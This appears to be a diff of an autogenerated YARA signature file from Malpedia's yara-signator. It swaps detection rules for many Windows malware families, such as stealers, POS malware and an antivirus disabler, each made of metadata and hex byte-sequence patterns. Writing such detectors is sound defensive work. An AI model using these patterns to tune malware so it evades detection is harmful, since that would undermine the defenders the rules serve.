filesize <204800 + 7 of them and filesize <1974272 } -rule MALPEDIA_Win_Morto_Auto : FILE +rule MALPEDIA_Win_Avast_Disabler_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b4e2fdf6-28d4-5bb0-a9a0-1ea448c5566e" + id = "6a09cca4-7cb6-5c97-b15b-4f7311a6621b" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.morto_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.avast_disabler_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "a9b63fda2800565a4b4486897d85bf042e81c5ab64e52d3f79cf07bf3408f96f" + logic_hash = "19754a7bc503b1b28bdfc059b6eb230f6f3e29b2e990d8ace51bd954a83ec439" score = 75 quality = 75 tags = "FILE" @@ -163838,32 +166628,32 @@ rule MALPEDIA_Win_Morto_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 280c30 40 3b450c 72f4 8b4608 6a40 } - $sequence_1 = { 50 e8???????? 83c40c 8945e4 8d45cc } - $sequence_2 = { 03d0 8911 ffd2 5f 5e } - $sequence_3 = { 03f5 42 8a1e 46 } - $sequence_4 = { ff35???????? c745ec04000000 c745fce8030000 ff15???????? } - $sequence_5 = { 8bf0 c1ee08 83e601 8d3c56 } - $sequence_6 = { 41 8d441201 8bd0 c1ea08 83e201 a87f 8d3c7a } - $sequence_7 = { c745d0636c6965 c745d46e745c61 8945d8 c745dc44726f70 } - $sequence_8 = { 6802000080 ff55e0 85c0 755f 8d45f8 50 } - $sequence_9 = { 894dfc 895508 eb03 8b75f4 b980000000 33c0 8dbdf0fdffff } + $sequence_0 = { 85c0 7404 3bc1 7515 0f31 35???????? } + $sequence_1 = { 7534 837c371400 752d 89443714 6a08 8d45f4 50 } + $sequence_2 = { b94ee640bb 85c0 7404 3bc1 7515 } + $sequence_3 = { 2b4c3718 51 53 53 50 e8???????? 8b4dfc } + $sequence_4 = { 50 ff15???????? 6a01 8d45f8 50 ff750c ff15???????? } + $sequence_5 = { 33c0 40 394510 7534 837c371400 752d } + $sequence_6 = { 8b5c3718 83c112 03d9 837d1000 } + $sequence_7 = { 75a9 5f 5e 5b 5d c21000 55 } + $sequence_8 = { 51 803d????????00 7520 c605????????01 } + $sequence_9 = { 5f 5e 5b 8be5 5d c20c00 3b0d???????? } condition: - 7 of them and filesize <49152 + 7 of them and filesize <41984 } -rule MALPEDIA_Win_Bachosens_Auto : FILE +rule MALPEDIA_Win_Gacrux_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "512fddd0-592d-56ea-af08-938454f6edb9" + id = "0c66c13b-77d9-5c78-ab68-75b7e55560db" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bachosens" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bachosens_auto.yar#L1-L119" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gacrux_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "b427aef6cac4c70adae9906b44868965e5c9a8d697254ea4be31acc54b01936b" + logic_hash = "bb1a910d98caf8e19645b8aead4c6d896507b388f794dfe868a61d77f59f135d" score = 75 quality = 75 tags = "FILE" @@ -163877,32 +166667,32 @@ rule MALPEDIA_Win_Bachosens_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7703 80c1e0 3ad1 7513 49ffc0 } - $sequence_1 = { 660f1f840000000000 410fb707 418b3e 6603c1 4803f9 0fb7c0 } - $sequence_2 = { 66443908 75f4 443bc1 740a b801000000 } - $sequence_3 = { 49f7d9 4c8bc5 660f1f840000000000 420fb61407 410fb608 8d429f 3c19 } - $sequence_4 = { 488bc7 ffc1 488d4001 803800 75f5 33d2 } - $sequence_5 = { 75f3 418bc9 66390a 7417 } - $sequence_6 = { 740e 488bc5 ffc2 488d4001 803800 } - $sequence_7 = { 4c03d1 458b7220 418b521c 4c03f1 458b7a24 4803d1 } - $sequence_8 = { 0fb70a 418d409f 6683f819 7704 } - $sequence_9 = { 75f3 418bc9 66390a 7417 488bc2 0f1f840000000000 ffc1 } + $sequence_0 = { 0f848e000000 41 83482120 49 8b01 49 83c108 } + $sequence_1 = { 894808 48 8b4c2430 48 894810 8b4c2444 } + $sequence_2 = { 48 03ca 849c013c010000 740b 41 81cb00300000 45 } + $sequence_3 = { 6bc838 48 8b05???????? 8b540120 c1ea02 1bd2 3bd6 } + $sequence_4 = { 7543 48 85db 7409 } + $sequence_5 = { 8b3a 48 8bcd 48 c1e91d 48 8bc5 } + $sequence_6 = { 41 ffc1 49 83c204 41 81f900010000 } + $sequence_7 = { 0fb7ee 66c1ed08 45 8a780c 45 8bda 45 } + $sequence_8 = { 56 41 57 48 83ec50 49 63e8 } + $sequence_9 = { 4d 033e 45 0fb6ed 49 8bcf } condition: - 7 of them and filesize <643072 + 7 of them and filesize <122880 } -rule MALPEDIA_Win_Temp_Stealer_Auto : FILE +rule MALPEDIA_Win_Roopy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f2cc61b5-19bf-56a2-9eca-3f40739e6ccc" + id = "18fd31da-7cad-5b5e-9e3e-b0b112556109" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.temp_stealer_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.roopy_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "225e1e9fc27831c15c6655569f2cde4ac7e8ac8903eef398ab726a5dfa80c059" + logic_hash = "6efa923735d84ae0bbc14d021be45ac1298053ce08c8f542f6e92d8a3dac3a28" score = 75 quality = 75 tags = "FILE" @@ -163916,32 +166706,32 @@ rule MALPEDIA_Win_Temp_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4d8bc7 498bce e8???????? 4885c0 7405 492bc6 eb04 } - $sequence_1 = { 488d4c2430 e8???????? 488b442430 48635004 488d051a730300 4889441430 488b442430 } - $sequence_2 = { 5e 5d c3 4889542410 48894c2408 55 53 } - $sequence_3 = { 488d4dc0 e8???????? 0f10442460 0f1145c0 0f104c2470 0f114dd0 660f6f05???????? } - $sequence_4 = { 418ac7 84c0 0f8408010000 8b4c2448 488d154240fdff 2b4c244c 41b826000000 } - $sequence_5 = { 488d4c2430 e8???????? 488d542430 488d4c2470 e8???????? 90 } - $sequence_6 = { 488d4c2450 e8???????? 660f6f05???????? 488d152a670300 488d4de0 4c896de0 f30f7f45f0 } - $sequence_7 = { 4183f805 0f8582000000 8b470c 458d487a c744243001000000 4c8d05ee7f0100 89442428 } - $sequence_8 = { ff15???????? 4c8be0 488985a0000000 488d15b9a30300 488bcb ff15???????? 4c8bf8 } - $sequence_9 = { 488d4c2458 e8???????? 90 488d8d48010000 e8???????? 488d45a8 } + $sequence_0 = { 8d45d8 30c9 6631d2 e8???????? 6a00 8b45ec 8945c0 } + $sequence_1 = { 89e5 8da42478fdffff 53 56 8945fc } + $sequence_2 = { 68???????? 64ff30 648920 8d431c 8b55fc e8???????? 89d8 } + $sequence_3 = { 85db 7403 8b40fc 3d04010000 0f8e91000000 89da } + $sequence_4 = { e9???????? 8d8decfeffff 8d95a0fcffff b810010000 e8???????? e8???????? } + $sequence_5 = { c745f800000000 c7859cfeffff00000000 c78598feffff00000000 c78594feffff00000000 c78578fdffff00000000 c7857cfdffff00000000 c78580fdffff00000000 } + $sequence_6 = { e8???????? 6a00 a1???????? 8945d8 } + $sequence_7 = { 30d2 e8???????? 6a00 8d45e4 e8???????? 6a00 a1???????? } + $sequence_8 = { e8???????? 8d8d8cfcffff 6631d2 8d8570fbffff e8???????? 8d858cfcffff 30c9 } + $sequence_9 = { 8b45dc 8d70ff f745e401000000 740d f745dcffffffff 0f856fffffff 8b45f0 } condition: - 7 of them and filesize <652288 + 7 of them and filesize <739328 } -rule MALPEDIA_Win_Mulcom_Auto : FILE +rule MALPEDIA_Win_Fast_Pos_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "8b428090-6e4d-587e-a305-32305b35e9f8" + id = "2b4b0c9d-f48b-554f-8a11-82dc9864cf63" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mulcom" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mulcom_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fast_pos_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "0fb6c90115244992995c28d6d59f0334f00cc1075a3607803abc8b37e1b5b55f" + logic_hash = "cc5eee3320509f0e654a55f4440afe73bd9962689fcfc57ca050257ab2933ad2" score = 75 quality = 75 tags = "FILE" @@ -163955,32 +166745,32 @@ rule MALPEDIA_Win_Mulcom_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 4883ec40 33ff 48c740f007000000 488978e8 488d4c2420 668978d8 4d85c0 } - $sequence_1 = { e8???????? 4c8b4310 488bd3 48837b1808 7203 488b13 4981f804010000 } - $sequence_2 = { e8???????? 488d4de8 e8???????? 488d4dc8 e8???????? 488d4da8 e8???????? } - $sequence_3 = { 48897020 488b05???????? 4833c4 48898510020000 498bf8 488bda 4889542438 } - $sequence_4 = { 33d2 33c9 458bc6 ff15???????? 85c0 0f8412020000 } - $sequence_5 = { e8???????? 488d4c2460 e8???????? 90 488dbea0000000 488d9580010000 } - $sequence_6 = { 4c897de0 488d45d0 48837de810 480f4345d0 448838 8b542440 483b55e0 } - $sequence_7 = { 4d63df 4c015d00 478d6c2fff eb3f 4585e4 7511 8b74243c } - $sequence_8 = { cc e8???????? cc 4c8bc2 488b5108 48395110 0f848b000000 } - $sequence_9 = { 410fb7d0 ff5018 440fb7c0 49ffce 418bff 66453be0 0f45fb } + $sequence_0 = { c785e4feffff04010000 ff15???????? e8???????? 8bc8 33c0 } + $sequence_1 = { e8???????? 8b95e4feffff 83c408 85c0 0f9485ebfeffff 83c2f0 } + $sequence_2 = { 52 8d8de0feffff e8???????? 8bb5e0feffff 6a44 8d857cfeffff } + $sequence_3 = { 6a00 6a00 68???????? ffb5e8feffff ff15???????? 85c0 7517 } + $sequence_4 = { c645fc07 e8???????? 8bf0 c645fc08 ff15???????? } + $sequence_5 = { 68???????? 56 c785e8feffff01000000 e8???????? 83c40c 8bc6 } + $sequence_6 = { 68ffff1f00 ff15???????? 6a00 50 } + $sequence_7 = { e8???????? 6a10 68???????? 68???????? 6a00 ff15???????? 6a00 } + $sequence_8 = { 50 ff36 8d85e0feffff 68???????? } + $sequence_9 = { 5d c20400 8b01 6a01 ff76f4 ff10 8bf8 } condition: - 7 of them and filesize <867328 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Ncctrojan_Auto : FILE +rule MALPEDIA_Win_Bundestrojaner_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "964a63a1-2a33-5eff-ac10-defb358349c1" + id = "f8dcad82-5285-5492-8b50-3aca915a7d86" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ncctrojan_auto.yar#L1-L159" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bundestrojaner" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bundestrojaner_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "ca1178d41ac898e0a6dcd72371fc848e91a6cf3f5857a4b6b78db9de7f47f454" + logic_hash = "14c57bb4c31bed67bf98bb86f0286f3377181b876957cd1f8d67f51314c230ea" score = 75 quality = 75 tags = "FILE" @@ -163994,38 +166784,32 @@ rule MALPEDIA_Win_Ncctrojan_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7536 8b85e8feffff 85c0 750a 68???????? } - $sequence_1 = { 68???????? e9???????? 83f801 750a } - $sequence_2 = { 83f801 750a 68???????? e9???????? 83f802 } - $sequence_3 = { 68e9fd0000 ffd6 8d8decfdffff 5f 8d5102 5e 668b01 } - $sequence_4 = { 8b442420 83c40c 83c008 836c240c01 89442414 0f85fffdffff } - $sequence_5 = { 8d4a10 0f1f840000000000 0f1041f0 83c020 } - $sequence_6 = { ffd6 50 8d85dcfdffff 50 } - $sequence_7 = { e8???????? 83c40c 85c0 752f 6a06 8d85c4bfffff } - $sequence_8 = { 51 f2c3 8b4df0 33cd f2e8bef6ffff } - $sequence_9 = { 83c414 e8???????? 84c0 7517 } - $sequence_10 = { 33c5 8945fc 56 6890010000 } - $sequence_11 = { 83faff 0f94c0 84c0 7405 } - $sequence_12 = { 83c418 83c008 03c6 8bcf } - $sequence_13 = { 0fb601 50 8d45d0 68???????? 50 } - $sequence_14 = { 83ec14 c645fc1f 8d95e8feffff 8bcc } - $sequence_15 = { 668bc1 8be5 5d c3 56 8bf1 } + $sequence_0 = { 894c2414 33ff 85c0 897c2410 741f 47 d1f8 } + $sequence_1 = { 3bc8 7cc3 8b5608 8b4e70 d9442460 42 897e04 } + $sequence_2 = { 50 8d55fc 51 52 e8???????? 8b87c0000000 b980000000 } + $sequence_3 = { 56 8b742438 57 8b7c242c 8bc7 c744241000000000 } + $sequence_4 = { 8b4e34 8d1482 52 50 8b460c 50 51 } + $sequence_5 = { 83c420 8b5104 85d2 0f95c2 83f806 885114 } + $sequence_6 = { d9c9 d959fc 3b5610 7cdb ddd8 8b4610 8b5c2418 } + $sequence_7 = { 75fb 83fe0b 7e15 8b442414 50 8b08 c7411406000000 } + $sequence_8 = { 8d54241c 89442420 8b44240c 6a00 52 6a00 } + $sequence_9 = { dd1c24 e8???????? 83c408 e8???????? 85c0 8944241c 7d04 } condition: - 7 of them and filesize <1160192 + 7 of them and filesize <729088 } -rule MALPEDIA_Win_Xfscashncr_Auto : FILE +rule MALPEDIA_Win_Deadwood_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6ee5ebd5-3415-5529-b820-2ef4f50b7f37" + id = "5f00cc5a-9602-50e1-9261-d675303486e9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xfscashncr_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deadwood" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.deadwood_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "9081cad85dadcbc9b76a9d19d302868541784728cc3671f5b0e80a45a72963e6" + logic_hash = "ea97d4cccc4d6a9b5e482bbc380fcc6fbef419bedaf1f051b13240e62ed24277" score = 75 quality = 75 tags = "FILE" @@ -164039,32 +166823,32 @@ rule MALPEDIA_Win_Xfscashncr_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0fb6c8 85c9 744e 8b4d10 e8???????? 0fb730 8b8d54ffffff } - $sequence_1 = { 50 8b4de8 8b5110 52 6a00 682d010000 8b45e8 } - $sequence_2 = { 898518feffff 8b8d18feffff 898d14feffff c745fc00000000 8b9514feffff 52 e8???????? } - $sequence_3 = { 686b070000 68???????? 8b4508 50 e8???????? 83c40c 8b4508 } - $sequence_4 = { 8b4de4 66891401 0fb755f4 81fa00800000 7f27 0fb745f4 3d00800000 } - $sequence_5 = { 83c418 8b08 8b5004 894d10 895514 c78564ffffff00000000 eb35 } - $sequence_6 = { e8???????? 0fb6d0 85d2 7557 837de802 750f 8b4520 } - $sequence_7 = { 837d0800 744a b801000000 85c0 7441 8b4508 83c008 } - $sequence_8 = { 8b4d08 d9ee d95c81fc 8b55f0 8b4508 d90490 d9ee } - $sequence_9 = { 8b5508 83e21f c1e206 8b048dc0195700 0fbe4c1004 81e17fffffff 8b5508 } + $sequence_0 = { 51 e8???????? 83c404 33db be0f000000 89b42418010000 899c2414010000 } + $sequence_1 = { 7303 8d4508 8b5518 52 50 8b4110 50 } + $sequence_2 = { 7464 8bf0 8b4814 894c2424 3bcb 7504 895c2428 } + $sequence_3 = { 6a01 8d442414 50 8d4c243c 897c247c c744241878f44500 e8???????? } + $sequence_4 = { 8bf8 85ff 0f8484000000 53 53 53 53 } + $sequence_5 = { ff15???????? 6804010000 8d8df4fdffff 51 50 ff15???????? 33d2 } + $sequence_6 = { e8???????? 8b542460 c7442440e4ba4500 bb???????? 895c2454 8b4204 c7440460c8ba4500 } + $sequence_7 = { 8b07 8b4804 837c390c00 0f94c1 884dd8 c745fc01000000 84c9 } + $sequence_8 = { 74ed 89450c 8b13 807a1d00 7404 8b3e eb13 } + $sequence_9 = { 8bb510ffffff e9???????? c3 8d8d34ffffff e9???????? 8d8d18ffffff e9???????? } condition: - 7 of them and filesize <3126272 + 7 of them and filesize <1055744 } -rule MALPEDIA_Win_Gratem_Auto : FILE +rule MALPEDIA_Win_Blackmagic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "89f0dee2-28c6-5a10-a3ad-288a448f45ac" + id = "dd528f6f-030a-5c0c-abc0-3a9e54fb0bef" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gratem_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmagic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.blackmagic_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "b58ab0ade84c3286830362f0f11bfb9519b8733c76dfe4e9cd7ba24746663e50" + logic_hash = "9b47417ce0472639cee5ef75e6c79509f45487b7ad058f003aa41d6f30ea451f" score = 75 quality = 75 tags = "FILE" @@ -164078,32 +166862,32 @@ rule MALPEDIA_Win_Gratem_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c744242404000000 ffd5 85c0 0f84b2000000 } - $sequence_1 = { 884e13 66a1???????? 33c9 6685c0 741f 0fb7c0 ba000c0000 } - $sequence_2 = { ff15???????? 8b442414 50 ff15???????? 8b5c2410 56 } - $sequence_3 = { 85c0 7405 e8???????? 8b8c24d4070000 5e 33cc } - $sequence_4 = { 663bc2 0f84ac030000 0fb7048d64bc4000 41 } - $sequence_5 = { 8b4c2440 8b542418 894114 895110 } - $sequence_6 = { 6a00 50 e8???????? 83c40c 6805010000 8d4c2404 51 } - $sequence_7 = { 53 ff54244c 85c0 8b442414 } - $sequence_8 = { 0fb7c0 baa8540000 663bc2 0f8420050000 0fb7048d64bc4000 41 } - $sequence_9 = { 56 8d34c5c0b84000 833e00 7513 50 e8???????? } + $sequence_0 = { 488d15b40c0700 488bcd e8???????? 488b4620 488903 488b5c2430 488b6c2438 } + $sequence_1 = { 4c8b01 ba01000000 41ff10 90 488bc7 488b4c2458 4833cc } + $sequence_2 = { 4863d0 488d4dd0 488b94d3086c0700 e8???????? 488b0d???????? 0fbe01 } + $sequence_3 = { 3bc3 740a 8b5c245c 85db 748d eb35 ff15???????? } + $sequence_4 = { 48895e08 488b4718 4c894010 488b4718 49894018 4c894718 49897810 } + $sequence_5 = { 0f114160 0f104070 488b8090000000 0f114170 0f118980000000 48898190000000 488d0587eaffff } + $sequence_6 = { 0f867d030000 458d7302 448d7d02 8bc5 4c8d1483 418b3a } + $sequence_7 = { 41f782b800000000080000 7427 498b8ad0000000 410fb6d3 e8???????? 440fb65c2430 0fbec8 } + $sequence_8 = { 488bd0 e8???????? 488b5308 498bce 482b13 48c1fa02 e8???????? } + $sequence_9 = { 4881f900100000 7223 488d4127 483bc1 0f8681000000 488bc8 e8???????? } condition: - 7 of them and filesize <155648 + 7 of them and filesize <1416192 } -rule MALPEDIA_Win_Medusa_Auto : FILE +rule MALPEDIA_Win_Waterspout_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e5ced166-c5f3-50c0-9e84-e449f6bff889" + id = "966cd02d-f7ac-590a-a30e-6be6c0215ec6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.medusa_auto.yar#L1-L167" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.waterspout" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.waterspout_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "b88f5d47ff30b39fc78331a46c037d026177b73d253964f40555a9ce1312bb08" + logic_hash = "791d1c9b538b0f8a628f6a3764a4be7336ff1d48478e7334334b2fc3c8924313" score = 75 quality = 75 tags = "FILE" @@ -164117,38 +166901,32 @@ rule MALPEDIA_Win_Medusa_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 680049ff69 004aff 6a00 4b ff6b00 4c ff6c004d } - $sequence_1 = { 1a03 69c421f3ef6a 2048b3 a5 } - $sequence_2 = { 52 ff7200 53 ff7300 54 } - $sequence_3 = { 317f52 56 5c ab 92 6f 0c48 } - $sequence_4 = { 9e 45 334a54 98 56 39ec 51 } - $sequence_5 = { 9f c48b2addd977 7612 a5 ba3c533f71 } - $sequence_6 = { e60e 6c 7bbc 45 } - $sequence_7 = { 54 ff740055 ff7500 56 } - $sequence_8 = { 99 5f 68066e570a 4f bfdb4a7adc } - $sequence_9 = { 1ddf859f31 e476 0c48 ce 74ec 1b826a013061 } - $sequence_10 = { 2a18 ae 085ffb cf } - $sequence_11 = { b5f9 43 324dd5 1ddf859f31 e476 0c48 } - $sequence_12 = { 5f e1fb 1cc9 3ca5 2c8e a1???????? d528 } - $sequence_13 = { b051 9f 4a d7 b9533e507c } - $sequence_14 = { 6c 6f aa 97 691c85470859bab566c1a5 } - $sequence_15 = { 813bf80937dc 8b4c6386 8608 5f } + $sequence_0 = { fec8 53 8841ff 8d4c2418 ff15???????? eb3a 3bf3 } + $sequence_1 = { c684243a01000023 c684243b0100003d c684243c010000ee c684243d0100004c c684243e01000095 c684243f0100000b c684244001000042 } + $sequence_2 = { 8d4c244c 68???????? 51 ff15???????? 8d7c2454 83c9ff 33c0 } + $sequence_3 = { 51 52 ff15???????? 85c0 7415 a1???????? 3bc3 } + $sequence_4 = { 50 8b842410200000 51 52 68???????? 50 } + $sequence_5 = { 6a00 a4 ff15???????? 50 ff15???????? 8b742460 } + $sequence_6 = { 0f84aa000000 6a00 56 55 } + $sequence_7 = { 8d542414 51 52 ffd6 83f801 74db 5f } + $sequence_8 = { a3???????? 8b442428 68???????? 6a00 6a6b } + $sequence_9 = { 33c0 8dbdfcfeffff 85f6 f3ab 7511 8d85fcfeffff 50 } condition: - 7 of them and filesize <1720320 + 7 of them and filesize <98304 } -rule MALPEDIA_Win_Naikon_Auto : FILE +rule MALPEDIA_Win_Carrotbat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2b0fa492-57d4-5b88-95d9-a0b325c3a81c" + id = "b4eb53a6-f964-58c0-a140-244bef4847cc" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.naikon_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.carrotbat_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "10ad96daf91bea73d71b90a544491c018eb03e29efd792a88809f482c814e2f1" + logic_hash = "c457876e0174827e0c750e3be442dfc99dddf6a42b624668fe26e525a3bccc83" score = 75 quality = 75 tags = "FILE" @@ -164162,32 +166940,32 @@ rule MALPEDIA_Win_Naikon_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 881c08 8d4405c9 50 e8???????? 59 8b4d0c 8901 } - $sequence_1 = { 8d85f8feffff 68???????? 50 e8???????? 8b3d???????? 83c418 8d85a8fcffff } - $sequence_2 = { ff750c c745f002000000 897dec c745e401000000 57 897de0 ff7508 } - $sequence_3 = { 53 50 8d85f4fffdff 56 50 ff35???????? } - $sequence_4 = { 83c418 57 50 8d8528ffffff 50 ffb690000000 e8???????? } - $sequence_5 = { 6a10 57 681cc10000 897df4 ff750c c745f002000000 } - $sequence_6 = { 53 53 8b4010 8d4d0c } - $sequence_7 = { e8???????? 83c40c 837df400 7408 ff75f4 e8???????? } - $sequence_8 = { 83c41c 33c0 808405dcf9fffffb 40 } - $sequence_9 = { 6a01 ff35???????? ff15???????? 8bd8 8b4508 46 6a00 } + $sequence_0 = { 8b7c2404 66c1c60c 8b742408 f6d7 33cd f7d3 } + $sequence_1 = { 8f442434 51 887c2404 66890424 890424 } + $sequence_2 = { 8b0c8d20ee4000 8d440104 8020fe ff36 e8???????? 59 } + $sequence_3 = { c3 8bff 56 57 33f6 bf???????? 833cf5a4d5400001 } + $sequence_4 = { 8b0c8d20ee4000 c1e006 8d440104 8020fe ff36 } + $sequence_5 = { c1f805 8d3c8520ee4000 8bf3 83e61f c1e606 8b07 0fbe440604 } + $sequence_6 = { 888c05f4fdffff 40 84c9 75ed 8d85f8feffff 6a5c } + $sequence_7 = { 50 66a5 ff15???????? 6810270000 ff15???????? } + $sequence_8 = { 5b c21000 ff25???????? c705????????6ca14000 } + $sequence_9 = { 8f442434 9c 57 ff74243c c24000 686d3f4f6e } condition: - 7 of them and filesize <188416 + 7 of them and filesize <360448 } -rule MALPEDIA_Win_Globeimposter_Auto : FILE +rule MALPEDIA_Win_Common_Magic_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "4d7b48e1-c009-5b34-a438-f100a6a58894" + id = "51a78d88-2ba4-5106-aa0c-c758f14020ef" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.globeimposter_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.common_magic" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.common_magic_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "608bf851e6cd1f78be1de6e26308954d73fd642b69ffa80c802e22a056e6ef77" + logic_hash = "b14e276c951448d5c194fa4cd51d59dbec4eb8aa1757a9205bc8d8e9186ff3cd" score = 75 quality = 75 tags = "FILE" @@ -164201,32 +166979,32 @@ rule MALPEDIA_Win_Globeimposter_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c1e810 8bca c1e908 23c7 23cf } - $sequence_1 = { 6a0c 5f eb0d 3d96000000 1bff } - $sequence_2 = { 8b4508 8b4e08 89442418 85ff 7452 } - $sequence_3 = { 0fd4cd 0f6e6f10 0fd4d5 0f7e4f08 0f73d120 0fd4cf 0f6e6f14 } - $sequence_4 = { 6a02 57 57 6800000040 8d85fcefffff } - $sequence_5 = { 0fd4cb 0f6e16 0ff4d0 0f6e6604 } - $sequence_6 = { 83c0fc 3918 7506 83e804 4f 75f6 } - $sequence_7 = { 83c104 f7db 75d7 5f 5b } - $sequence_8 = { 8bf0 8b06 8d7604 0119 3919 } - $sequence_9 = { 8bc7 f7f6 33d2 0fafc6 2bf8 } + $sequence_0 = { 8d049d78824100 8b30 8945fc 90 } + $sequence_1 = { 03c0 eb3c 8bd1 b8feffff7f d1ea 2bc2 } + $sequence_2 = { c78578ffffff00000000 c7857cffffff00000000 8d9574ffffff c645fc09 8d8d84feffff } + $sequence_3 = { 6689855cffffff b8feffff7f 2bc1 c7856cffffff00000000 c78570ffffff07000000 } + $sequence_4 = { 33c9 8bc1 3914c5e84a4100 7408 } + $sequence_5 = { 